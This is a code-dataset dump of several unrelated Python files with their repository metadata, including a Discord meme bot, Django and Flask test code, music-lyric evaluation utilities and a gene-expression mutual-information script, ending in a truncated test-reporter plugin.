| 29.319444 | 116 | 0.595926 | 229 | 2,111 | 5.362445 | 0.445415 | 0.036645 | 0.039088 | 0.039088 | 0.047231 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002736 | 0.307437 | 2,111 | 71 | 117 | 29.732394 | 0.837209 | 0.344387 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653008e4c994353e972f1759bbe391729b9632a5 | 768 | py | Python | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | 2 | 2015-01-10T21:20:43.000Z | 2015-05-23T05:07:15.000Z | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | null | null | null | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | null | null | null | #lista = []
#lista = list()
#print(type(lista), '---')
#krotka = tuple()
#krotka = (1,2,3)
#print(type(krotka), hash(krotka))
##krotka[0] = '?'
#slow = dict()
#slow = {
# 1: 2,
# 2: 3,
#}
#slow = dict(a=2, b=3)
#zbior = set()
#zbior = set([])
#zbior = set([1,2,3,4])
#zbior = {1,2,3,4}
#print(zbior, type(zbior), '---')
#lista = [(1,1),(2,1),(1,3),(4,1),]
#print(lista)
#wartosc = lista.sort()
#print(type(wartosc))
#print(lista)
#dc = {
# True: 1,
# (0, 0): 2,
# 'wewe': {},
#}
#print (dc)
#dc['wewe'] = True
#print (dc)
#print (dc['wewe'])
#print (dc['wewe2'])
zbior_a = set()
zbior_a.add(1)
zbior_a.add(1)
zbior_a.add(1)
zbior_a.add(2)
print(zbior_a)
zbior_b = {1,3,4,5,6}
#help(zbior_a)
print(zbior_b & zbior_a)
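# expected output of the two prints above: {1, 2} and then {1} (the intersection)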
import turtle
turtle.Turtle()
| 12.8 | 35 | 0.549479 | 131 | 768 | 3.145038 | 0.229008 | 0.116505 | 0.087379 | 0.072816 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0 | 0.062208 | 0.16276 | 768 | 59 | 36 | 13.016949 | 0.578538 | 0.670573 | 0 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6530f69a9d6c0f0ab965c8079057603341bbe2a8 | 499 | py | Python | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | """
subclass of QMenu to save title
used in internationalization
"""
#from PySide2.QtWidgets import QMenu
from PySide6.QtWidgets import QMenu
class QMenuWidget(QMenu):
"""Override QMenu __init__ to save title"""
def __init__(self, title=None, titlePrefix=None, titleSuffix=None):
super().__init__(title)
self.originaltitle = title
self.titlePrefix = "" if titlePrefix is None else titlePrefix
self.titleSuffix = "" if titleSuffix is None else titleSuffix
| 27.722222 | 71 | 0.719439 | 59 | 499 | 5.881356 | 0.474576 | 0.034582 | 0.063401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004988 | 0.196393 | 499 | 17 | 72 | 29.352941 | 0.860349 | 0.268537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6532ff0967a9b39489f5fb868f45e33c221764c0 | 2,332 | py | Python | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | 1 | 2020-12-29T19:57:47.000Z | 2020-12-29T19:57:47.000Z | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | 13 | 2020-06-29T11:15:59.000Z | 2021-09-22T19:18:36.000Z | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | null | null | null | """Command line script to initial data to the db."""
from re import compile, MULTILINE
from os import path
from logging import getLogger, DEBUG
from django.core.management.base import BaseCommand, CommandError
from strops.config.settings import ROOT_DIR
from strops.operators.models import Operator, Field
from strops.operators.scripts import run_all as run_all_op_scripts
from strops.schemes.scripts import run_all as run_all_scheme_scripts
from strops.schemes.models import ExpansionScheme, ExpansionParameter, OperatorRelation
from strops.references.scripts import insert_inspirehep_entries
LOGGER = getLogger("strops")
PAT = compile(r"\s+", MULTILINE)
class Command(BaseCommand):
"""Command line script to initial data to the db."""
help = (
"Add fields, operators, schemes and relations to the db."
" Needs to start on a clean db state."
)
papers_file = path.join(ROOT_DIR, "strops", "references", "data", "papers.txt")
tables = [
Operator,
Field,
ExpansionScheme,
ExpansionParameter,
OperatorRelation,
]
def add_arguments(self, parser):
"""Adds `inspires_ids` argument."""
def handle(self, *args, **options):
"""Runs `insert_inspirehep_entries` on all provided ids."""
verbosity = int(options["verbosity"])
if verbosity > 1:
LOGGER.setLevel(DEBUG)
for table in self.tables:
if table.objects.first():
raise CommandError(
"This command should only be run on empty databases."
" However, the table %s contains data." % table
)
self.read_ids()
run_all_op_scripts()
run_all_scheme_scripts()
def read_ids(self):
"""Reads inspirehep ids from papers file."""
LOGGER.info("Reading papers into db.")
ids = []
with open(self.papers_file, "r") as inp:
text = inp.read()
text = PAT.sub(" ", text.replace(",", " "))
ids += [idx for idx in text.split(" ") if idx]
LOGGER.info("Parsing inspirehep.net ids %s", ids)
n_created, errors = insert_inspirehep_entries(ids)
for error in errors:
LOGGER.exception(error)
LOGGER.info("Created %d new entries", n_created)
| 31.093333 | 87 | 0.638937 | 282 | 2,332 | 5.177305 | 0.432624 | 0.041096 | 0.014384 | 0.026027 | 0.087671 | 0.087671 | 0.087671 | 0.050685 | 0.050685 | 0 | 0 | 0.000581 | 0.261578 | 2,332 | 74 | 88 | 31.513514 | 0.847271 | 0.092624 | 0 | 0 | 0 | 0 | 0.146411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.196078 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6533b935e14731be5963102ecb9975b4d55ca072 | 2,623 | py | Python | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands, tasks
import aiohttp
from .utils import COLOR
# Map of channel IDs to tasks.Loop automeme loops
automeme_loops = {}
async def automeme_routine(ctx):
'''sends a meme every 10 mins'''
async with aiohttp.ClientSession() as session:
url = "https://meme-api.herokuapp.com/gimme"
async with session.get(url) as response:
response = await response.json()
embed = discord.Embed(
title=response['title'],
url=response['postLink'],
color=COLOR.JOY)
embed.set_image(url=response['url'])
embed.set_footer(
text=f"r/{response['subreddit']} | Requested by {ctx.author.name} | Enjoy your dank memes!")
await ctx.send(embed=embed)
class Meme(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=['meme'])
async def memes(self, ctx, param: str = None):
sub = '/' if param is None else '/' + str(param)
async with aiohttp.ClientSession() as session:
url = "https://meme-api.herokuapp.com/gimme" + sub
async with session.get(url) as response:
response = await response.json()
embed = discord.Embed(
title=response['title'],
url=response['postLink'],
color=COLOR.JOY)
embed.set_image(url=response['url'])
txt = f"r/{response['subreddit']} | Requested by {ctx.author.name} | Enjoy your dank memes"
embed.set_footer(text=txt)
await ctx.send(embed=embed)
@commands.command()
async def automeme(self, ctx):
'''Triggers the automeme taskloop for the channel context'''
channel_id = ctx.channel.id
if channel_id in automeme_loops:
await ctx.send('Automeme already running here')
else:
# using decorator instead of tasks.Loop directly to preserve
# default arguments
loop = tasks.loop(seconds=600)(automeme_routine)
automeme_loops[channel_id] = loop
loop.start(ctx)
@commands.command()
async def automeme_cancel(self, ctx):
'''Cancel the Automeme task in the current channel'''
channel_id = ctx.channel.id
if channel_id not in automeme_loops:
await ctx.send('Automeme not running here')
else:
automeme_loops[channel_id].cancel()
del automeme_loops[channel_id]
await ctx.send('Automeme canceled here')
def setup(client):
client.add_cog(Meme(client))
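# Loading sketch (hypothetical; assumes a discord.py bot object and that this
# file is importable under the extension path below):
#
#   bot.load_extension('bot.cogs.meme_cog')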
| 35.445946 | 104 | 0.611514 | 318 | 2,623 | 4.965409 | 0.327044 | 0.051298 | 0.037999 | 0.037999 | 0.509183 | 0.442052 | 0.442052 | 0.39772 | 0.357188 | 0.357188 | 0 | 0.002651 | 0.280976 | 2,623 | 73 | 105 | 35.931507 | 0.834571 | 0.047274 | 0 | 0.428571 | 0 | 0.035714 | 0.149362 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65340349d8b03cded222f98e67e8a453401833b1 | 5,196 | py | Python | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 106 | 2018-03-05T16:24:47.000Z | 2022-03-19T19:12:25.000Z | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 1,494 | 2018-02-27T17:02:21.000Z | 2022-03-24T15:10:30.000Z | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 15 | 2019-02-03T01:34:59.000Z | 2022-03-29T01:59:13.000Z | from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models.ontology_term import OntologyTerm, get_human_readable_name_from_api
class TestOntologyTerm(TestCase):
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.import_from_api.yaml")
def test_get_or_create_from_api_fetches(self):
self.assertEqual(
"month", OntologyTerm.get_or_create_from_api("UO:0000035").human_readable_name
)
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.invalid.yaml")
def test_get_or_create_invalid_term(self):
self.assertRaises(ValueError, OntologyTerm.get_or_create_from_api, "UO:9999999")
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_get_or_create_from_api_returns_cached(self, mock_api_call):
mock_api_call.return_value = "medulloblastoma"
self.assertEqual(
"medulloblastoma",
OntologyTerm.get_or_create_from_api("EFO:0002939").human_readable_name,
)
mock_api_call.assert_called_once_with("EFO:0002939")
mock_api_call.reset_mock()
self.assertEqual(
"medulloblastoma",
OntologyTerm.get_or_create_from_api("EFO:0002939").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.import_entire_ontology.yaml"
)
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_import_entire_ontology(self, mock_api_call):
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
# I used the UO ontology here because it is much smaller than other important
# ontologies like EFO, which could take upwards of a minute to download and parse
created_terms = OntologyTerm.import_entire_ontology("uo")
self.assertEqual(
OntologyTerm.objects.all().count(),
559, # Since we are using a VCR, this number should not change until we refresh it
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"month", OntologyTerm.get_or_create_from_api("UO:0000035").human_readable_name
)
mock_api_call.assert_not_called()
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.import_cl.yaml")
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_import_cl(self, mock_api_call):
"""Try importing the CL ontology, which was updated at some point and
broke the original parsing code"""
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
created_terms = OntologyTerm.import_entire_ontology("cl")
self.assertEqual(
OntologyTerm.objects.all().count(),
2493, # Since we are using a VCR, this number should not change until we refresh it
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"hematopoietic cell",
OntologyTerm.get_or_create_from_api("CL:0000988").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.import_cellosaurus.yaml"
)
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_import_cellosaurus(self, mock_api_call):
"""The cellosaurus ontology is not part of the OLS so we need to handle
it separately. We still include it because metaSRA uses its terms.
NOTE: the actual cellosaurus ontology is massive, so this VCR was
created using a trimmed-down cellosaurus ontology where I went in and
deleted a bunch of the publications and cell lines from the respective
lists. Besides this, no alterations were made to the original."""
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
created_terms = OntologyTerm.import_entire_ontology("cvcl")
self.assertEqual(
OntologyTerm.objects.all().count(), 34, # This is the number I counted in the file
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"#W7079", OntologyTerm.get_or_create_from_api("CVCL:E549").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.cellosaurus_import_from_api.yaml"
)
def test_get_or_create_from_cellosaurus_api(self):
self.assertEqual(
"LNCaP", OntologyTerm.get_or_create_from_api("CVCL:0395").human_readable_name
)
| 40.59375 | 100 | 0.709392 | 685 | 5,196 | 5.089051 | 0.237956 | 0.034137 | 0.044177 | 0.047332 | 0.6965 | 0.690189 | 0.608434 | 0.573723 | 0.573723 | 0.573723 | 0 | 0.016809 | 0.209969 | 5,196 | 127 | 101 | 40.913386 | 0.8324 | 0.221324 | 0 | 0.4375 | 0 | 0 | 0.244657 | 0.186573 | 0 | 0 | 0 | 0 | 0.2375 | 1 | 0.0875 | false | 0 | 0.1875 | 0 | 0.2875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65349c9a9000776d51444c80d41b291b58e2ff6b | 742 | py | Python | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | 1 | 2021-04-30T21:54:40.000Z | 2021-04-30T21:54:40.000Z | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | null | null | null | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | null | null | null | def askQuestionYN(question):
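    '''Ask a yes/no question on stdin and return True/False. Both Latin and
    Cyrillic answers are accepted. Usage sketch:

        if askQuestionYN('Continue?'):
            ...
    '''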
positive=['y','Y','д','Д','YES','ДА','yes','да','Yes','Да']
negative=['n','N','н','Н','НЕТ','NO','нет','no','Нет','No']
tries=5
for i in range(tries):
try:
tmpstr=(input(question+' (Y/N) '))
except KeyboardInterrupt:
return (False)
position=[number for number in positive if number == tmpstr]
if position:
return (True)
position=[number for number in negative if number == tmpstr]
if position:
return (False)
        print('Invalid input. Please try again.')
        print('Used ' + str(i + 1) + ' of ' + str(tries) + ' attempts')
    print("No answer was received :-( returning (NO)")
return (False) | 39.052632 | 68 | 0.552561 | 92 | 742 | 4.456522 | 0.5 | 0.036585 | 0.039024 | 0.04878 | 0.268293 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0.003683 | 0.268194 | 742 | 19 | 69 | 39.052632 | 0.751381 | 0 | 0 | 0.263158 | 0 | 0 | 0.193809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.263158 | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6536955befd2369e4ccc408a760b178fe86210f1 | 531 | py | Python | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | 3 | 2018-02-11T23:20:18.000Z | 2019-12-15T10:29:22.000Z | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | null | null | null | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | 1 | 2019-11-01T06:42:47.000Z | 2019-11-01T06:42:47.000Z | import json
from flask import url_for
def test_get_incomes(client):
_incomes_url = url_for('api.v1.incomes')
# Make sure db is empty
response = client.get(_incomes_url)
assert len(response.json) == 0
# Create income
income = {
'amount': 100,
'description': 'test income'
}
client.post(_incomes_url, data=json.dumps(income), content_type='application/json')
# Get incomes and assert only one exists
response = client.get(_incomes_url)
assert len(response.json) == 1
| 23.086957 | 87 | 0.66855 | 71 | 531 | 4.816901 | 0.535211 | 0.116959 | 0.099415 | 0.140351 | 0.280702 | 0.280702 | 0.280702 | 0.280702 | 0.280702 | 0 | 0 | 0.014599 | 0.225989 | 531 | 22 | 88 | 24.136364 | 0.817518 | 0.13936 | 0 | 0.153846 | 0 | 0 | 0.128035 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653927e36e6c722e124ad7cab7a4b86aab936ffd | 3,822 | py | Python | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 1,903 | 2021-09-22T18:43:49.000Z | 2022-03-31T08:22:13.000Z | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 33 | 2021-09-24T16:22:18.000Z | 2022-03-30T09:35:20.000Z | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 124 | 2021-09-24T08:56:56.000Z | 2022-03-29T05:48:03.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#
def get_pitch_duration_sequence(notes):
seq = []
i = 0
while i < len(notes):
if notes[i] > 128:
i += 1
else:
if i + 1 >= len(notes):
break
if notes[i + 1] <= 128:
i += 1
else:
pitch = str(notes[i])
duration = str(notes[i + 1])
seq.extend([pitch, duration])
i += 2
return seq
def separate_sentences(x, find_structure=False, SEP='[sep]'):
z = x.copy()
separate_positions = [k for k, v in enumerate(z) if v == SEP]
separate_positions.insert(0, -1)
sents = []
for i in range(len(separate_positions) - 1):
u, v = separate_positions[i] + 1, separate_positions[i + 1]
sent = z[u:v]
if find_structure:
sent = list(map(int, sent))
sent = get_pitch_duration_sequence(sent)
sents.append(sent)
return sents
def get_lyrics(lyric_file):
with open(lyric_file, 'r') as input_file:
lines = input_file.readlines()
lyrics = list(map(lambda x : x.rstrip('\n').split(' '), lines))
return lyrics
def get_song_ids(song_id_file):
with open(song_id_file, 'r') as input_file:
song_ids = input_file.readlines()
song_ids = list(map(lambda x : int(x.rstrip('\n')), song_ids))
return song_ids
def get_songs(
melody_file,
lyric_file=None,
song_id_file=None,
is_generated=False,
get_last=False,
find_structure=False,
cut_exceed_sent=False,
beam=5,
SEP='[sep]',
ALIGN='[align]',
):
lyrics = get_lyrics(lyric_file)
song_ids = get_song_ids(song_id_file)
lyric_sents = list(map(lambda x : x.count(SEP), lyrics))
def to_tuple(x):
pitch_duration = [i for i in x if i != SEP and i != ALIGN]
pd_tuples = [(pitch_duration[2 * i], pitch_duration[2 * i + 1]) for i in range(len(pitch_duration) // 2)]
return pd_tuples
with open(melody_file, 'r') as input_file:
melodies = input_file.readlines()
if is_generated:
melodies = list(filter(lambda x : x.startswith('H-'), melodies))
if len(melodies) == len(lyrics) * beam:
melodies.sort(key = lambda x : (int(x.split('\t')[0].split('-')[1]), - float(x.split('\t')[1])))
melodies = [x for i, x in enumerate(melodies) if i % beam == 0]
else:
melodies.sort(key = lambda x : int(x.split('\t')[0].split('-')[1]))
melodies = list(map(lambda x : x.rstrip('\n').split('\t')[-1], melodies))
assert len(melodies) == len(lyrics)
melody_seqs = list(map(lambda x : x.rstrip('\n').split(' '), melodies))
melody_seqs = [i for i in melody_seqs if i != ALIGN]
for i in range(len(melody_seqs)):
melody_seqs[i] = list(filter(lambda x : x.isdigit() or x == SEP, melody_seqs[i]))
if get_last:
for i in range(len(melody_seqs)):
if melody_seqs[i][-1] != SEP:
melody_seqs[i].append(SEP)
melody_seq_sents = list(map(lambda x : separate_sentences(x, find_structure=find_structure), melody_seqs))
song_seqs = []
for i, seq in enumerate(melody_seq_sents):
if cut_exceed_sent and len(seq) > lyric_sents[i]:
seq = seq[0 : lyric_sents[i]]
song_seq = []
for k, sent in enumerate(seq):
song_seq.extend(sent)
song_seq.append(SEP)
song_seqs.append(song_seq)
song_num = song_ids[-1] + 1
songs = [[] for _ in range(song_num)]
for k, v in enumerate(song_ids):
songs[v].extend(song_seqs[k])
songs = list(map(to_tuple, songs))
return songs
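# Usage sketch (hypothetical file names; beam/SEP defaults as above):
#
#   songs = get_songs('generated.txt', lyric_file='lyrics.txt',
#                     song_id_file='song_ids.txt', is_generated=True)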
| 30.094488 | 113 | 0.570644 | 542 | 3,822 | 3.848708 | 0.190037 | 0.033557 | 0.017258 | 0.040268 | 0.235858 | 0.118408 | 0.099233 | 0.076222 | 0.037392 | 0.037392 | 0 | 0.012565 | 0.291994 | 3,822 | 126 | 114 | 30.333333 | 0.758315 | 0.023548 | 0 | 0.074468 | 0 | 0 | 0.011275 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 1 | 0.06383 | false | 0 | 0 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653acd9ef897519567f178ca7a77b4c035d02398 | 1,821 | py | Python | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | '''
export PATH=/mnt/home/azodichr/miniconda3/bin:$PATH
### should ssh dev-intel16-k80
input1: expression data, Fold change or FPKM
input2: start
input3: stop
'''
import sys,os,argparse
import pandas as pd
import numpy as np
import math
from sklearn.metrics.cluster import normalized_mutual_info_score
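# Silence library warnings by replacing warnings.warn with a no-op
# (the normalized_mutual_info_score calls below can otherwise be noisy).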
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
def main():
parser = argparse.ArgumentParser(description='This code is for calculating the Mutual information for a gene expression matrix. Because it is too slow to calculate a big matrix, you may want to do the job for a subset of your data, defined by the starting row number and the stoping row number.')
# Required
req_group = parser.add_argument_group(title='REQUIRED INPUT')
req_group.add_argument('-file', help='Expression matrix', required=True)
req_group.add_argument('-path', help='path to the Expression matrix', required=True)
req_group.add_argument('-start', help='where the subset starts', required=True)
req_group.add_argument('-stop', help='where the subset stops', required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
file = args.file
path = args.path
start = int(args.start)
stop = int(args.stop)
out = open('MI_%s_%s_%s'%(file,start,stop),'w')
df = pd.read_csv(path+file, sep='\t', index_col = 0, header = 0)
rowname = df.index.tolist()
title = 'gene'
for name in rowname:
title = title + '\t' + name
out.write(title + '\n')
out.flush()
x = start -1
while x < stop:
gene1 = rowname[x]
result = gene1
for gene2 in rowname:
MI = float(normalized_mutual_info_score(df.loc[gene1,:],df.loc[gene2,:]))
result = result + '\t%s'%MI
out.write(result + '\n')
out.flush()
x += 1
out.close()
if __name__ == '__main__':
main()
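# Example invocation (hypothetical file/path; computes rows 1..100 of the matrix):
#
#   python MI_pandas_20180919.py -file expression.txt -path /path/to/data/ -start 1 -stop 100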
| 27.179104 | 297 | 0.707853 | 286 | 1,821 | 4.395105 | 0.468531 | 0.031822 | 0.035004 | 0.060461 | 0.099443 | 0.099443 | 0.074781 | 0.074781 | 0 | 0 | 0 | 0.012354 | 0.155409 | 1,821 | 66 | 298 | 27.590909 | 0.804941 | 0.09061 | 0 | 0.043478 | 0 | 0.021739 | 0.249392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.021739 | 0.130435 | 0 | 0.173913 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653aeb720022e1fa6cce3df66de41e2925004141 | 1,900 | py | Python | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | # Copyright 2009 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from testify import test_reporter
class TestCaseJSONReporter(test_reporter.TestReporter):
def __init__(self, *args, **kwargs):
super(TestCaseJSONReporter, self).__init__(*args, **kwargs)
# Time to open a log file
self.log_file = open(self.options.test_case_json_results, "a")
# We also want to track log output
self.log_hndl = None
self._reset_logging()
def _reset_logging(self):
root = logging.getLogger('')
if self.log_hndl:
# Remove it if we already have one
root.removeHandler(self.log_hndl)
